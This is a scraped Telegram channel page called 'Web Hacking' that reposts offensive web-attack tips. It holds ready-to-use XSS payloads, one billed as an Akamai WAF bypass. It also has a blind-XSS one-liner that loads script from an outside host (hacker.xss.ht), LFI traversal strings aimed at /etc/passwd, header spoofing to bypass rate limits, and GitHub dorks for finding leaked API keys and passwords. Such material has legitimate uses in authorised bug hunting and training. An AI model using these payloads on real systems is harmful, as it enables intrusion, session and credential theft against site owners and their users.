Web Hacking – Telegram

Web Hacking

2.13K subscribers

52 photos

6 files

38 links

@OSCP_training
@pfsense
@WifiHacking

Download Telegram

About

Blog

Apps

Platform

2.13K subscribers

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

3.28K views20:52

A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>

10.5K views05:10

A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

👍4👌1

10.6K views05:39

Another one

"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

10.9K views20:29

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning

PortSwigger Research

Making HTTP header injection critical via response queue poisoning

HTTP header injection is often under-estimated and misclassified as a moderate severity flaw equivalent to XSS or worse, Open Redirection. In this post, I'll share a simple technique I used to take a

👍2

3.1K views20:25

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack#:~:text=specialWordlists.py.-,Command%20line%20usage,-From%20time%20to

👍1

3.25K views19:34

👍1

3.3K views19:40

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Checklist; After Recon

👍5

3.24K views04:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Rate Limit Bypass Headers

3.56K views04:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters

3.65K views04:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

IDOR Checklist !

4.19K views04:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Testing Authentication Flaws in Web Application

👍1

4.37K views04:14

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Some filter bypass payload list while hunting for LFi vulnerability

→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd

👍3

4.14K views03:49

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

LFI Parameters

👍5

4.29K views18:23

Remote File Inclusion (RFI)

👍5

14.1K views09:00

Rate limit bypass using some custom headers:

X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP

❤‍🔥8👍1👌1🐳1

15.8K views04:10

5.6K views06:50

403 bypass techniques

👍5

18.5K views04:16

Bypassing Rate Limit Protection

👍5🤮1

20.9K views05:49

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

👍5🤮3

6.84K views21:51

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Github Dorks Cheatsheet

Find files with sensitive info, API Keys, Tokens and Passwords.

+ list of github dorks automation tools

👍18👌4🤮2

6.35K views08:44